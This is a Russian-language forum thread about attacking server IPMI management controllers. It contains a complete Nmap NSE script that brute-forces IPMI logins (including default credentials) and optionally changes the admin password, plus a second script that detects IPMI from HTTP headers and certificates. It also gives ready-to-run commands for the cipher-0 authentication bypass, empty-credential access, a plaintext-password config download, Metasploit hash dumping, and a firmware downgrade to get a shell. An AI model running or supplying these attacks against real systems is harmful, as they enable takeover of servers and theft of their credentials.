По долгу службы на работе обнаружили интересную особенность в IPMI (аналог KVM) - штука для удаленного мониторинга и физическим управлением сервера. Штука в том, что DHCP сам назначает и навязывает IPMI у многих ДЦ о чем последние могут тупо просто не знать. Поэтому внутри сетки целесообразно чекать 623UDP. А я поделюсь NSE скриптом для nmap'а авторство которого принадлежит не мне, а моему начальнику. Скрипт сам подключается к порту IPMI, пытается сменить пароль если это надо, оповещает о всех найденных IPMI и брутит пароль (в том числе дефолтные). Code: local brute = require "brute" local creds = require "creds" --local ipmi = require "ipmi" local nmap = require "nmap" local shortport = require "shortport" local stdnse = require "stdnse" local string = require "string" local tab = require "table" description = [[ Performs brute force password auditing against IPMI server with ipmitool util and change default password if 'pwdchange' argument >= 5 symbols. ]] author = "i.zuev" license = "Same as Nmap--See https://nmap.org/book/man-legal.html" categories = {"intrusive", "brute"} --- -- need utils - ipmutil and ipmitool -- @usage -- nmap -sU -p623 -PS80,443 -PA80,443 --max-retries 5 --script ipmi-supermicro-brute --script-args 'userdb=/opt/ipmi-users.txt,passdb=/opt/ipmi-pwd.txt' <host> -- nmap -sU -p623 -PS80,443 -PA80,443 --max-retries 5 --script ipmi-supermicro-brute --script-args 'brute.credfile=/opt/ipmi-creds.txt' <host> -- nmap -sU -p 623 -PA80,443 -PS80,443 --reason --open --max-retries 5 --script ipmi-ipmiutil-brute.nse --script-args 'brute.credfile=/opt/ipmi-creds.txt,pwdchange=NEWPWDADMIN' <host> -- brute.firstonly = Boolean - Stop attack when the first credentials are found (https://nmap.org/nsedoc/lib/brute.html) -- brute.mode = user/creds/pass - Username password iterator (https://nmap.org/nsedoc/lib/brute.html) -- passdb = file - Path to password list --- one pass = one string -- userdb = file - Path to user list --- one login = one string -- brute.credfile = file - Path to credentials file, use '/' as delimeter (ADMIN/ADMIN) -- -- for debug message use -d option -- -- @output -- PORT STATE SERVICE REASON -- 623/udp open|filtered unknown -- | ipmi-supermicro-brute: -- | Accounts -- |_ admin:admin => Valid credentials -- portrule = shortport.port_or_service(623, "asf-rmcp", "udp", {"open", "open|filtered"}) -- if string.find(s1, "welcome home") ~= nil then Driver = { new = function(self, host, port, pwdchange) local o = {} setmetatable(o, self) self.__index = self o.host = host o.port = port o.pwdchange = pwdchange return o end, connect = function( self ) return true end, disconnect = function( self ) return true end, check = function( self ) if (self.port.state == "open" or self.port.state == "open|filtered") then return true else return false end end, login = function( self, username, password ) --[[ ---- ipmiutil error codes - http://ipmiutil.sourceforge.net/docs/UserGuide Code Dec Description ---- --- ----------------------------------------- +0x00, 0, "Command completed successfully", 0x80, 128, "Invalid Session Handle or Empty Buffer", +0x81, 129, "Lost Arbitration", --- "GetSessChallenge: Invalid user name" 0x82, 130, "Bus Error", 0x83, 131, "NAK on Write - busy", 0x84, 132, "Truncated Read", 0xC0, 192, "Node Busy", 0xC1, 193, "Invalid Command", 0xC2, 194, "Command invalid for given LUN", 0xC3, 195, "Timeout while processing command", 0xC4, 196, "Out of space", 0xC5, 197, "Invalid Reservation ID, or cancelled", 0xC6, 198, "Request data truncated", 0xC7, 199, "Request data length invalid", 0xC8, 200, "Request data field length limit exceeded", 0xC9, 201, "Parameter out of range", 0xCA, 202, "Cannot return requested number of data bytes", 0xCB, 203, "Requested sensor, data, or record not present", 0xCC, 204, "Invalid data field in request", 0xCD, 205, "Command illegal for this sensor/record type", 0xCE, 206, "Command response could not be provided", 0xCF, 207, "Cannot execute duplicated request", 0xD0, 208, "SDR Repository in update mode, no response", 0xD1, 209, "Device in firmware update mode, no response", 0xD2, 210, "BMC initialization in progress, no response", 0xD3, 211, "Destination unavailable", 0xD4, 212, "Cannot execute command. Insufficient privilege level", 0xD5, 213, "Cannot execute command. Request parameters not supported", 253, "Cannot connect" 0xFF, 255, "Unspecified error" ]] local cmd = "ipmiutil config -U " .. username .. " -P " .. password .. " -N " .. self.host.ip .. " 2>&1 ; echo RC=$?" local handler = assert(io.popen(cmd)) local output local retcod = "9999" --local output = assert(handler:read('*a')) -- '*a' означает считывание всех данных for line in handler:lines() do if string.len(line) >= 1 then if string.match(line, "RC=") then retcod = tonumber(line:match "RC=(%d+)") end if string.match(line, "ipmiutil config, ") then output = line:match "ipmiutil config, (.*)" end end end handler:close() if retcod == 0 then if string.len(self.pwdchange) >= 5 then -- ipmitool -H IP -U ADMIN -P ADMIN user set password 2 NEWPWD ; local pwdoutput = "EMPTY" local pwdretcod = "8888" local pwdtry = 1 local pwdcmd = "ipmitool -U " .. username .. " -P " .. password .. " -H " .. self.host.ip .. " user set password 2 " .. self.pwdchange .. " 2>&1 ; echo RC=$?" ::PWDNEWTRY:: stdnse.print_debug(1, "IPMI pwdcmd (try %s): %s", pwdtry, pwdcmd) local pwdhandler = assert(io.popen(pwdcmd)) for line in pwdhandler:lines() do if string.len(line) >= 1 then if string.match(line, "RC=") then pwdretcod = tonumber(line:match "RC=(%d+)") elseif string.match(line, "Invalid user name") then pwdoutput = "Invalid user name" else pwdoutput = line end end end pwdhandler:close() if pwdretcod == 0 then stdnse.print_debug(1, "IPMI(%s): %s - password changed to %s (%s:%s)", pwdretcod, pwdoutput, self.pwdchange,username, password) return true, creds.Account:new(username, password, "new password is " .. self.pwdchange) elseif pwdtry <=2 then pwdtry = pwdtry+1 goto PWDNEWTRY else stdnse.print_debug(1, "IPMI(%s): fail to change password with 2 tries (new %s, old %s:%s)", pwdretcod, self.pwdchange,username, password) return false, brute.Error:new( "Failed to change password." ) end else stdnse.print_debug(1, "IPMI(%s): %s - success (%s:%s)", retcod, output, username, password) return true, creds.Account:new(username, password, creds.State.VALID) end elseif retcod == 129 then stdnse.print_debug(1, "IPMI(%s): %s - wrong username (%s:%s)", retcod, output, username, password) return false, brute.Error:new( "Wrong username." ) elseif retcod == 206 or retcod == 253 then stdnse.print_debug(1, "IPMI(%s): %s - wrong password (%s:%s)", retcod, output, username, password) return false, brute.Error:new( "Wrong password." ) else stdnse.print_debug(1, "IPMI(%s): %s - unknown error (%s:%s)", retcod, output, username, password) return false, brute.Error:new( "Unknown error." ) end end, disconnect = function( self ) return true end } action = function(host, port) local pwdchange = '' -- нужно ли менять пароль? если переменная не пустая, то будет задан новый пароль, равный значению переменной local status, result, engine if nmap.registry.args['pwdchange'] then pwdchange = nmap.registry.args.pwdchange end engine = brute.Engine:new( Driver, host, port, pwdchange) -- engine:setMaxThreads(thread_num) engine.options.script_name = SCRIPT_NAME status, result = engine:start() return result end
Пару заметок ещё о том как обнаружить ipmi. 1) Веб морда на 80 порту в header: GoAhead-Webs 2) Смотрим сертификат на 443 порту: В издателе сертификата есть ключевые слова Supermicro, Ahead, IPMI. Позже NSE скрипт докину.
Обещал скриптик, который бы чекал IPMI даже если нет его открытых портов. Собственно вот Spoiler: Вывод Code: local creds = require "creds" local nmap = require "nmap" local shortport = require "shortport" local stdnse = require "stdnse" local string = require "string" local tab = require "table" local sslcert = require "sslcert" local tls = require "tls" description = [[Check ipmi by http headers and ssl certificates.]] author = "Morozov Alexey" license = "Same as Nmap--See https://nmap.org/book/man-legal.html" categories = {"discovery", "same"} local comm = require "comm" require "shortport" portrule = function(host, port) return ((port.number == 80 or port.number == 443 or port.number == 5901 or port.number == 5900 or port.number == 623) and port.protocol == "tcp" and port.state == "open") or (port.number == 623 and port.protocol == "udp" and port.state == "open") end local NON_VERBOSE_FIELDS = { "commonName", "organizationName", "stateOrProvinceName", "countryName" } function table_find(t, value) local i, v for i, v in ipairs(t) do if v == value then return i end end return nil end function date_to_string(date) if not date then return "MISSING" end if type(date) == "string" then return string.format("Can't parse; string is \"%s\"", date) else return stdnse.format_timestamp(date) end end local function maybe_decode(str) -- If length is not even, then return as-is if #str < 2 or #str % 2 == 1 then return str end if str:byte(1) > 0 and str:byte(2) == 0 then -- little-endian UTF-16 return unicode.transcode(str, unicode.utf16_dec, unicode.utf8_enc, false, nil) elseif str:byte(1) == 0 and str:byte(2) > 0 then -- big-endian UTF-16 return unicode.transcode(str, unicode.utf16_dec, unicode.utf8_enc, true, nil) else return str end end function stringify_name(name) local fields = {} local _, k, v if not name then return nil end for _, k in ipairs(NON_VERBOSE_FIELDS) do v = name[k] if v then fields[#fields + 1] = string.format("%s=%s", k, maybe_decode(v) or '') end end if nmap.verbosity() > 1 then for k, v in pairs(name) do -- Don't include a field twice. if not table_find(NON_VERBOSE_FIELDS, k) then if type(k) == "table" then k = stdnse.strjoin(".", k) end fields[#fields + 1] = string.format("%s=%s", k, maybe_decode(v) or '') end end end return stdnse.strjoin("/", fields) end local function output_str(cert) local lines = {} lines[#lines + 1] = "Subject: " .. stringify_name(cert.subject) if cert.extensions then for _, e in ipairs(cert.extensions) do if e.name == "X509v3 Subject Alternative Name" then lines[#lines + 1] = "Subject Alternative Name: " .. e.value break end end end if nmap.verbosity() > 0 then lines[#lines + 1] = "Issuer: " .. stringify_name(cert.issuer) end if nmap.verbosity() > 0 then lines[#lines + 1] = "Public Key type: " .. cert.pubkey.type lines[#lines + 1] = "Public Key bits: " .. cert.pubkey.bits lines[#lines + 1] = "Signature Algorithm: " .. cert.sig_algorithm end lines[#lines + 1] = "Not valid before: " .. date_to_string(cert.validity.notBefore) lines[#lines + 1] = "Not valid after: " .. date_to_string(cert.validity.notAfter) if nmap.verbosity() > 0 then lines[#lines + 1] = "MD5: " .. stdnse.tohex(cert:digest("md5"), { separator = " ", group = 4 }) lines[#lines + 1] = "SHA-1: " .. stdnse.tohex(cert:digest("sha1"), { separator = " ", group = 4 }) end if nmap.verbosity() > 1 then lines[#lines + 1] = cert.pem end return stdnse.strjoin("\n", lines) end action = function(host, port) local resports = {} if (port.number == 623 or port.number == 5900 or port.number == 5901) or (port.number == 623 and port.protocol == "udp") then port.version.name = "ipmi" nmap.set_port_version(host, port) -- return end local domains = {} -- domains['name'] = 'IPMI_DETECT_BY_PORT' if (port.number == 80) then local status, result = comm.exchange(host, port, "GET / HTTP/1.0\r\n\r\n", {bytes=260, proto=port.protocol}) if (status) then -- print(result) local goAheads = string.find(result, 'GoAhead-Webs', 1, true) print(goAheads) if (goAheads ~= nil) then table.insert(domains, 'DETECTED IPMI') end end end if (port.number == 443) then -- host.targetname = tls.servername(host) local status, cert = sslcert.getCertificate(host, port) if (status) then local res_cert = output_str(cert) local certIpmi = string.find(res_cert, 'IPMI', 1, true) local certAmi = string.find(res_cert, 'American Megatrends', 1, true) if (certIpmi ~= nil) or (certAmi ~= nil) then table.insert(domains, 'DETECTED IPMI') end end end -- if (result ~= "HTTP/1.0 404 Not Found\r\n\r\n") then -- return -- end -- So far so good, now see if we get random data for another request -- status, result = comm.exchange(host, port, -- "random data\r\n\r\n", {bytes=15, proto=port.protocol}) -- if (not status) then -- return -- end -- if string.match(result, "[^%s!-~].*[^%s!-~].*[^%s!-~]") then -- Detected -- port.version.name = "skype2" -- -- nmap.set_port_version(host, port) -- return return stdnse.format_output(true, domains) end
Ещё немного в кассу уязвимости ipmi * Cleartext: ipmitool -H <IP/FQDN> -U "" -P "" user list 1 - пустой пароль пустой логин, может дать доступ * AUth bypass Cipher 0: выполнить команды без аутентификации Code: ipmitool -U ADMIN -P "1223" -C 0 -H <IP/FQDN> lan print 1 или Code: ipmitool -I lanplus -U ADMIN -P "1223" -C 0 -H <IP/FQDN> lan print 1 - Пароль любой * Обратившись на порт T:49152 на URL "/PSBlock" можно скачать конфигурационный файл 'XXXX_bmc.conf', содержащий пароли в открытом виде. Преимущественно подвержены Supermicro Onboard IPMI контроллеры. * в спецификации IPMI 2.0 заложена возможность вытащить и брутить хеши паролей (которые используют уязвимые sha1 и md5) от всех учеток через 623 порт UDP Code: msfconsole use auxiliary/scanner/ipmi/ipmi_dumphashes set RHOSTS set THREADS 256 run * Последний скрин можно глянуть без аутентификации по пути http://IP-OF-IPMI/images/Snapshot.bmp
Bonus, некоторые прошивки апдейтятся методом заливки новой. Мы можем залить более старую прошивку без подписи сертификатом и IPMI её без проблем скушает. Тогда у нас уже будет SH вместо SMASH.